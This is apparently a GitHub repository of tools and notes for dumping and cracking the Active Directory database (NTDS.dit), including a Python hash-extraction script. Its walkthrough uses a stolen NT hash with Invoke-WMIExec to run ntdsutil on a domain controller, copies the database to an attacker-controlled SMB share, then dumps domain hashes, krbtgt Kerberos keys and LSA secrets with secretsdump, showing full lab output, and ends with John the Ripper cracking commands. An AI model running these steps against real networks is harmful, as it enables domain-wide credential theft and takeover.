├── practice_ntds.zip
├── ntdsxtract_v1_0.zip
├── libesedb-alpha-20120102.tar.gz
├── README.md
├── dshashes.py
└── dump-ntds.md
/practice_ntds.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/interference-security/ntds-tools/HEAD/practice_ntds.zip
--------------------------------------------------------------------------------
/ntdsxtract_v1_0.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/interference-security/ntds-tools/HEAD/ntdsxtract_v1_0.zip
--------------------------------------------------------------------------------
/libesedb-alpha-20120102.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/interference-security/ntds-tools/HEAD/libesedb-alpha-20120102.tar.gz
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # ntds-tools
2 | Tools for NTDS.dit
3 |
4 | https://govolution.wordpress.com/2016/04/13/ntds-cracking-with-kali/
5 |
6 | https://gist.github.com/ddouhine/018ac4a8c95498101e7f
7 |
## Installation on Kali

The downloads below are plain-HTTP and unauthenticated. The same archives are committed to this repository (`ntdsxtract_v1_0.zip`, `libesedb-alpha-20120102.tar.gz`, `dshashes.py`), so prefer those copies and compare checksums before building — the Fedora URL below carries the tarball's MD5 in its path.
9 |
10 | wget http://ptscripts.googlecode.com/svn/trunk/dshashes.py
11 |
12 | wget http://pkgs.fedoraproject.org/repo/pkgs/libesedb/libesedb-alpha-20120102.tar.gz/198a30c98ca1b3cb46d10a12bef8deaf/libesedb-alpha-20120102.tar.gz
13 |
14 | tar -zxf libesedb-alpha-20120102.tar.gz
15 |
16 | cd libesedb-20120102/
17 |
18 | ./configure && make && sudo make install
19 |
20 | wget http://ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip
21 |
22 | unzip ntdsxtract_v1_0.zip
23 |
## Extract Hashes
25 |
/root/Downloads/ntds/libesedb-20120102/esedbtools/esedbexport ntds.dit

(After the `make install` step above, `esedbexport` should also be on `PATH`; either way the tables are written to `ntds.dit.export/` in the current directory.)
27 |
python /root/Downloads/ntds/NTDSXtract\ 1.0/dsusers.py ntds.dit.export/datatable.4 ntds.dit.export/link_table.7

(The numeric suffixes such as `.4` and `.7` may differ between exports; list `ntds.dit.export/` and use the file names you actually get.)
29 |
./hashdumpwork --passwordhashes SYSTEM --lmoutfile ./lm-out.txt --ntoutfile ./nt-out.txt --pwdformat ophc > dsusers.results

(Options take two ASCII hyphens; the en-dashes in the original rendering will not parse. Note that `--lmoutfile`, `--ntoutfile` and `--pwdformat` are not options of the bundled `dshashes.py`, which only accepts `--rid`, `--name`, `--passwordhashes <SYSTEM hive>`, `--passwordhistory <SYSTEM hive>` and `--exclude-disabled`, and prints pwdump-style `user:rid:lm:nt:::` lines straight to stdout — those lines can be fed to `john` without the grep/sed post-processing below.)
31 |
grep -A 2 "Password hashes:" dsusers.results | grep -v "Password hashes" | grep -v 'Record ID' | grep -v "\-\-" | sort | uniq > allHashes
33 |
grep '\$NT\$' allHashes | sed 's/.\(.*\)/\1/' > NTHashes

(The `sed` expression drops the first character of every line — presumably the leading whitespace of the `grep -A` context output.)
35 |
grep -v '\$NT\$' allHashes | sed 's/.\(.*\)/\1/' > LMHashes
37 |
## Cracking
39 |
john --fork=8 NTHashes

(If john does not auto-detect the `$NT$`-prefixed lines, add `--format=NT`; the bare LM values in `LMHashes` need `--format=LM` given explicitly.)
41 |
--------------------------------------------------------------------------------
/dshashes.py:
--------------------------------------------------------------------------------
# This file was derived from dsusers.py, which is part of ntdsxtract.
2 | #
3 | # ntdsxtract is free software: you can redistribute it and/or modify
4 | # it under the terms of the GNU General Public License as published by
5 | # the Free Software Foundation, either version 3 of the License, or
6 | # (at your option) any later version.
7 | #
8 | # ntdsxtract is distributed in the hope that it will be useful,
9 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
11 | # GNU General Public License for more details.
12 | #
13 | # You should have received a copy of the GNU General Public License
# along with ntdsxtract. If not, see <http://www.gnu.org/licenses/>.
15 |
16 | '''
17 | @editor: LaNMaSteR53
18 | @author: Csaba Barta
19 | @license: GNU General Public License 2.0 or later
20 | @contact: csaba.barta@gmail.com
21 | '''
22 |
import sys

from ntds.dsdatabase import *
from ntds.dsrecord import *
from ntds.dslink import *
from ntds.dstime import *
from ntds.dsobjects import *
28 |
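def usage():
    """Print the command-line help for dshashes.py to stdout.

    The script takes two positional arguments -- the exported ``datatable``
    and ``link_table`` (they are handed to ``dsInitDatabase`` and
    ``dsInitLinks`` further down) -- followed by zero or more options.  The
    placeholders shown here mirror what the option loop actually reads:
    ``--rid`` is converted with ``int()``, ``--name`` is compared verbatim
    with the user's name, and ``--passwordhashes`` / ``--passwordhistory``
    both take the path of the SYSTEM hive passed to ``dsInitEncryption``.
    """
    # Single-argument print(...) is valid under both Python 2 and 3.
    print("DSHashes")
    print("Extracts user hashes in a user-friendly format\n")
    print("usage: %s <datatable> <link_table> [options]" % sys.argv[0])
    print("  options:")
    print("    --rid <rid>")
    print("          List user identified by RID")
    print("    --name <name>")
    print("          List user identified by Name")
    print("    --passwordhashes <SYSTEM hive>")
    print("          Extract password hashes")
    print("    --passwordhistory <SYSTEM hive>")
    print("          Extract password history")
    print("    --exclude-disabled")
    print("          Exclude disabled accounts from output")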
44 |
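# --- Command-line parsing -----------------------------------------------------
# argv[1] and argv[2] are the exported datatable and link_table; everything
# after them is an option.  There is no __main__ guard, so this runs on import.
if len(sys.argv) < 3:
    usage()
    sys.exit(1)

rid = -1          # -1: no RID filter
name = ""         # "": no name filter
syshive = ""      # SYSTEM hive path, required by --passwordhashes/--passwordhistory
pwdump = False    # emit the current LM/NT hashes
pwhdump = False   # emit the password history
optid = 0
# Options whose value is the argument that follows them.
_VALUE_OPTIONS = ("--rid", "--name", "--passwordhashes", "--passwordhistory")

print("Running with options:")
for optid, opt in enumerate(sys.argv):
    if opt not in _VALUE_OPTIONS:
        continue
    # Script, two tables, the option and its value make at least five
    # arguments, and the value must really follow the option (the original
    # indexed argv[optid + 1] unguarded and could raise IndexError).
    if len(sys.argv) < 5 or optid + 1 >= len(sys.argv):
        usage()
        sys.exit(1)
    value = sys.argv[optid + 1]
    if opt == "--rid":
        try:
            rid = int(value)
        except ValueError:
            # A non-numeric RID used to surface as an uncaught traceback.
            print("Invalid RID (expected an integer): %s" % value)
            usage()
            sys.exit(1)
        print("\tUser RID: %d" % rid)
    elif opt == "--name":
        name = value
        print("\tUser name: %s" % name)
    elif opt == "--passwordhashes":
        syshive = value
        pwdump = True
        print("\tExtracting password hashes")
    else:  # --passwordhistory
        syshive = value
        pwhdump = True
        print("\tExtracting password history")

# Flag option; evaluated once instead of on every loop iteration.
excl_dsbl = "--exclude-disabled" in sys.argv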
87 |
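# --- Open the exported tables and, if hashes are wanted, the key material -----
db = dsInitDatabase(sys.argv[1])   # exported datatable
dl = dsInitLinks(sys.argv[2])      # exported link_table

# dsInitEncryption takes the SYSTEM hive; presumably it derives the boot key
# that unlocks the stored hashes -- the call itself is opaque here.  It is
# only needed when hashes or history are going to be printed.
if pwdump or pwhdump:
    dsInitEncryption(syshive)

# Only records of the "Person" object type are treated as user accounts.
utype = dsGetTypeIdByTypeName(db, "Person")
if utype == -1:
    # Exit non-zero (the original exited 0 here) so a caller in a pipeline
    # can tell that nothing was extracted.
    print("Unable to get type id for Person")
    sys.exit(1)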
99 |
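# --- Enumerate user records and print hashes in pwdump format -----------------
# Filler values for history lines (see the note printed at the end of the
# run): the LM and NT hashes of the string 'password' stand in for the half
# of the line that is not available, so cracking tools still parse the line.
_LM_OF_PASSWORD = 'E52CAC67419A9A224A3B108F3FA6CB6D'
_NT_OF_PASSWORD = '8846F7EAEE8FB117AD06BDD830B7586C'
# Well-known "no LM hash" filler, written when the record carries no LM hash.
_NO_LM_HASH = 'aad3b435b51404eeaad3b435b51404ee'

print("\nList of hashes:")
print("==============")
for recordid in dsMapLineIdByRecordId:
    if int(dsGetRecordType(db, recordid)) != utype:
        continue
    user = dsUser(db, recordid)

    # --rid / --name / --exclude-disabled filters.
    if rid != -1 and user.SID.RID != rid:
        continue
    if name != "" and user.Name != name:
        continue
    if excl_dsbl and 'Disabled' in user.getUserAccountControl():
        continue

    if pwdump:
        (lm, nt) = user.getPasswordHashes()
        # Accounts without an NT hash are skipped entirely, as before; a
        # missing LM hash is replaced by the filler so the column count holds.
        if nt != '':
            lmhash = lm if lm != '' else _NO_LM_HASH
            # `line` rather than `hash`, which shadowed the builtin.
            line = "%s:%s:%s:%s:::" % (user.SAMAccountName, user.SID.RID, lmhash, nt)
            print(line)

    if pwhdump:
        (lmhistory, nthistory) = user.getPasswordHistory()
        # One pwdump line per historical hash; the numbered suffix keeps the
        # user names distinct for the cracker.
        if nthistory is not None:
            for hashid, nthash in enumerate(nthistory):
                print("%s_nthistory%d:%s:%s:%s:::" % (user.SAMAccountName, hashid, user.SID.RID, _LM_OF_PASSWORD, nthash))
        if lmhistory is not None:
            for hashid, lmhash in enumerate(lmhistory):
                print("%s_lmhistory%d:%s:%s:%s:::" % (user.SAMAccountName, hashid, user.SID.RID, lmhash, _NT_OF_PASSWORD))

if pwhdump:
    print("\n[*] NOTE: NT and LM hashes are shown on individual lines with the respective hash of 'password' in the opposing position.")
    print("This is done in order to make sure the output plays nice with various hash cracking tools. Account for this when cracking historical hashes.\n")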
145 |
--------------------------------------------------------------------------------
/dump-ntds.md:
--------------------------------------------------------------------------------
1 | ## Dump NTDS.dit file from target server:
2 |
3 | How Attackers Dump Active Directory Database Credentials: https://adsecurity.org/?p=2398
4 |
5 | How-to-dump-windows2012-credentials: https://github.com/nixawk/pentest-wiki/blob/master/4.Post-Exploitation/Windows_ActiveDirectory/How-to-dump-windows2012-credentials.md
6 |
7 | Invoke-TheHash: https://github.com/Kevin-Robertson/Invoke-TheHash
8 |
### Find the NTDS.dit file location with either of these commands (`reg query` from CMD, or `Get-ItemProperty` from PowerShell); the `DSA Database file` value is the path you want
10 | ```
11 | PS C:\> reg query HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters
12 |
13 | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters
14 | System Schema Version REG_DWORD 0x38
15 | Root Domain REG_SZ DC=test,DC=local
16 | Configuration NC REG_SZ CN=Configuration,DC=test,DC=local
17 | Machine DN Name REG_SZ CN=NTDS Settings,CN=WIN-PJNUFB8U83P,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=test,DC=local
18 | DsaOptions REG_SZ 1
19 | IsClone REG_DWORD 0x0
20 | ServiceDll REG_EXPAND_SZ %systemroot%\system32\ntdsa.dll
21 | DSA Working Directory REG_SZ C:\Windows\NTDS
22 | DSA Database file REG_SZ C:\Windows\NTDS\ntds.dit
23 | Database backup path REG_SZ C:\Windows\NTDS\dsadata.bak
24 | Database log files path REG_SZ C:\Windows\NTDS
25 | Hierarchy Table Recalculation interval (minutes) REG_DWORD 0x2d0
26 | Database logging/recovery REG_SZ ON
27 | DS Drive Mappings REG_MULTI_SZ c:\=\\?\Volume{7e3f7bcd-5ece-11e6-93e8-806e6f6e6963}\
28 | DSA Database Epoch REG_DWORD 0x79fd
29 | Strict Replication Consistency REG_DWORD 0x1
30 | Schema Version REG_DWORD 0x38
31 | ldapserverintegrity REG_DWORD 0x1
32 | Global Catalog Promotion Complete REG_DWORD 0x1
33 |
34 | PS C:\> Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters
35 |
36 | System Schema Version : 56
37 | Root Domain : DC=test,DC=local
38 | Configuration NC : CN=Configuration,DC=test,DC=local
39 | Machine DN Name : CN=NTDS Settings,CN=WIN-PJNUFB8U83P,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=test,DC=local
40 | DsaOptions : 1
41 | IsClone : 0
42 | ServiceDll : C:\Windows\system32\ntdsa.dll
43 | DSA Working Directory : C:\Windows\NTDS
44 | DSA Database file : C:\Windows\NTDS\ntds.dit
45 | Database backup path : C:\Windows\NTDS\dsadata.bak
46 | Database log files path : C:\Windows\NTDS
47 | Hierarchy Table Recalculation interval (minutes) : 720
48 | Database logging/recovery : ON
49 | DS Drive Mappings : {c:\=\\?\Volume{7e3f7bcd-5ece-11e6-93e8-806e6f6e6963}\}
50 | DSA Database Epoch : 31229
51 | Strict Replication Consistency : 1
52 | Schema Version : 56
53 | ldapserverintegrity : 1
54 | Global Catalog Promotion Complete : 1
55 | PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters
56 | PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS
57 | PSChildName : Parameters
58 | PSDrive : HKLM
59 | PSProvider : Microsoft.PowerShell.Core\Registry
60 | ```
61 |
### Make sure the `temp` folder on the SMB share is writable and empty before ntdsutil writes to it

The IFM set that ntdsutil creates there is what the offline dump below consumes: `Active Directory\ntds.dit` together with the `registry\SYSTEM` and `registry\SECURITY` hives. Both the ntdsutil execution on the domain controller and the DC writing that set to a non-DC SMB share are high-signal events for defenders, so on an engagement expect them to be logged, and remove the IFM copy from the share once it has been processed.
63 |
64 | ### Using batch script:
65 | ```
66 | root@kali:/mnt/smb_share/temp# cat ../exp.bat
REM Create a full Install-From-Media (IFM) copy of the AD database on the attacker-controlled share.
REM "ac i ntds" selects the NTDS instance (ntdsutil's short form of "activate instance ntds");
REM "ifm" / "create full <dir>" write "Active Directory\ntds.dit" plus "registry\SYSTEM" and
REM "registry\SECURITY" under <dir>, which secretsdump.py reads later in this document; "q q" quits.
ntdsutil "ac i ntds" "ifm" "create full \\192.168.136.128\kali_smb_share\temp" q q
68 |
69 | PS C:\> Invoke-WMIExec -verbose -Domain test.local -Username master -Hash 4557b6a0a22dc7cafd03c4a40e77f7e1 -Target 192.168.136.130 -Command "cmd /c \\192.168.136.128\kali_smb_share\exp.bat"
70 | VERBOSE: Connecting to 192.168.136.130:135
71 | VERBOSE: WMI reports target hostname as WIN-PJNUFB8U83P
72 | VERBOSE: test.local\master accessed WMI on 192.168.136.130
73 | VERBOSE: Using WIN-PJNUFB8U83P for random port extraction
74 | VERBOSE: Connecting to 192.168.136.130:49154
75 | VERBOSE: Attempting command execution
76 | Command executed with process ID 3116 on 192.168.136.130
77 | ```
78 |
79 | ### Using powershell script:
80 | ```
81 | root@kali:/mnt/smb_share/temp# cat ../exp.ps1
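# Create a full Install-From-Media (IFM) copy of the AD database on the attacker-controlled
# share; the target directory receives "Active Directory\ntds.dit" plus "registry\SYSTEM"
# and "registry\SECURITY", which secretsdump.py consumes later in this document.
# -ErrorVariable / -WarningVariable take a variable NAME (B, C), not an expanded value:
# the original "-ErrorVariable $B" passed the (unset, empty) value of $B instead of a
# name, so $B and $C were never populated and the error/warning logs stayed empty.
$A = Invoke-Expression 'ntdsutil "ac i ntds" "ifm" "create full \\192.168.136.128\kali_smb_share\temp" q q' -ErrorVariable B -WarningVariable C -Verbose
# Persist stdout, errors and warnings on the share so the result can be checked from Kali.
Out-File -FilePath \\192.168.136.128\kali_smb_share\temp\out.log -InputObject $A -Encoding ASCII
Out-File -FilePath \\192.168.136.128\kali_smb_share\temp\error.log -InputObject $B -Encoding ASCII
Out-File -FilePath \\192.168.136.128\kali_smb_share\temp\warning.log -InputObject $C -Encoding ASCII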
86 |
87 | PS C:\> Invoke-WMIExec -verbose -Domain test.local -Username master -Hash 4557b6a0a22dc7cafd03c4a40e77f7e1 -Target 192.168.136.130 -Command "powershell -NoP -sta -NonI -W Hidden -Exec bypass -File \\192.168.136.128\kali_smb_share\exp.ps1"
88 | VERBOSE: Connecting to 192.168.136.130:135
89 | VERBOSE: WMI reports target hostname as WIN-PJNUFB8U83P
90 | VERBOSE: test.local\master accessed WMI on 192.168.136.130
91 | VERBOSE: Using WIN-PJNUFB8U83P for random port extraction
92 | VERBOSE: Connecting to 192.168.136.130:49154
93 | VERBOSE: Attempting command execution
94 | Command executed with process ID 3128 on 192.168.136.130
95 | ```
96 |
## Dump contents of NTDS.dit file

This runs offline (`LOCAL`) against the IFM copy. `ntds.dit` alone is not enough: `secretsdump.py` also needs the `SYSTEM` hive from the same IFM set — the `bootKey` it derives from that hive is what lets it decrypt the PEK (`Pek found and decrypted` below) and then the stored hashes — and the `SECURITY` hive for the LSA secrets and cached logon data.
98 |
99 | ```
100 | root@kali:/mnt/smb_share/temp# locate smbexec.py
101 | /opt/Veil/Veil-Pillage/lib/impacket_smbexec.py
102 | /usr/local/bin/smbexec.py
103 | /usr/share/doc/python-impacket/examples/smbexec.py
104 | /usr/share/keimpx/lib/smbexec.py
105 |
106 | root@kali:/mnt/smb_share/temp# secretsdump.py -system '/mnt/smb_share/temp/registry/SYSTEM' -security '/mnt/smb_share/temp/registry/SECURITY' -ntds '/mnt/smb_share/temp/Active Directory/ntds.dit' LOCAL
107 | Impacket v0.9.13 - Copyright 2002-2015 Core Security Technologies
108 |
109 | INFO:root:Target system bootKey: 0xc2aaa99b063f6b9c9c836e8a9d0b6b59
110 | INFO:root:Dumping cached domain logon information (uid:encryptedHash:longDomain:domain)
111 | INFO:root:Dumping LSA Secrets
112 | INFO:root:$MACHINE.ACC
113 | $MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:033513a7b82596b25264a1ca49203824
114 | INFO:root:DefaultPassword
115 | (Unknown User):ROOT#123
116 | INFO:root:DPAPI_SYSTEM
117 | 0000 01 00 00 00 63 09 9F 09 CA 4C FB 62 38 6A FE 37 ....c....L.b8j.7
118 | 0010 9E 74 4F B8 1C CF EC F5 6A 1A DA 56 67 5F 1F 13 .tO.....j..Vg_..
119 | 0020 14 BC 43 2B BB 79 EA C8 7B AF EE 82 ..C+.y..{...
120 | INFO:root:NL$KM
121 | 0000 D7 BB 16 96 AB 11 49 D9 E6 38 CC 46 59 EC CC 65 ......I..8.FY..e
122 | 0010 1E 17 D2 BC B2 33 E5 97 A9 91 5A 1F D7 79 37 71 .....3....Z..y7q
123 | 0020 F9 40 A4 8D 5F 66 9C 5B 69 4A 70 C7 E8 ED 1D B8 .@.._f.[iJp.....
124 | 0030 1A 54 30 E1 AB 6C FA F3 96 97 96 E5 F0 F1 DD 99 .T0..l..........
125 | INFO:root:Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
126 | INFO:root:Searching for pekList, be patient
127 | INFO:root:Pek found and decrypted: 0xed11979a1de0316229732c75231f7d7d
128 | INFO:root:Reading and decrypting hashes from /mnt/smb_share/temp/Active Directory/ntds.dit
129 | Administrator:500:aad3b435b51404eeaad3b435b51404ee:cb136a448767792bae25563a498a86e6:::
130 | Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
131 | test1:1001:aad3b435b51404eeaad3b435b51404ee:393ee50e62f891cb5b7ae3ead79376ac:::
132 | test2:1002:aad3b435b51404eeaad3b435b51404ee:6b1d71c4691455f46c59bae11126d4a4:::
133 | WIN-PJNUFB8U83P$:1003:aad3b435b51404eeaad3b435b51404ee:033513a7b82596b25264a1ca49203824:::
134 | krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c728695aa9b97cb064a5de26ba77112d:::
135 | test.local\slave:1107:aad3b435b51404eeaad3b435b51404ee:ff5484488517e138ef86fbb3e7fe1133:::
136 | test.local\master:1108:aad3b435b51404eeaad3b435b51404ee:4557b6a0a22dc7cafd03c4a40e77f7e1:::
137 | INFO:root:Kerberos keys from /mnt/smb_share/temp/Active Directory/ntds.dit
138 | WIN-PJNUFB8U83P$:aes256-cts-hmac-sha1-96:0126f1b74a8b21d3240e04cd7fd1b15f3900850d6b8453a95bc71d3fbe431a25
139 | WIN-PJNUFB8U83P$:aes128-cts-hmac-sha1-96:92618b22bf62c7251c433a19c537ea6c
140 | WIN-PJNUFB8U83P$:des-cbc-md5:f18a4aad4938b564
141 | krbtgt:aes256-cts-hmac-sha1-96:6d6607f3c1c56697436abf49a380a8f2f0486bd177201b1b245c01310328cb3b
142 | krbtgt:aes128-cts-hmac-sha1-96:695845f807093ce19c7f4ff79dcdc023
143 | krbtgt:des-cbc-md5:5eb564893e73027c
144 | test.local\slave:aes256-cts-hmac-sha1-96:1062fece2758c08941859d7482d2786e49cdc35899c0f7824148f9b68853d1d8
145 | test.local\slave:aes128-cts-hmac-sha1-96:b415a6275c7b49c27090a823d55d5e9e
146 | test.local\slave:des-cbc-md5:626dababb558d54a
147 | test.local\master:aes256-cts-hmac-sha1-96:667dd1da063265b55cf5abe47e4b743b7019a831e51cb5675653bcb5652896da
148 | test.local\master:aes128-cts-hmac-sha1-96:02383fd8e3322ce68eb131984ba8c37d
149 | test.local\master:des-cbc-md5:d63173252cf42fc1
150 | INFO:root:Cleaning up...
151 | ```
152 |
153 | ## Note
All the hashes and passwords shown above are not used or re-used by me anywhere, and the test machine on which they were generated has been destroyed. Contact me if you still want the plaintext data.
155 |
--------------------------------------------------------------------------------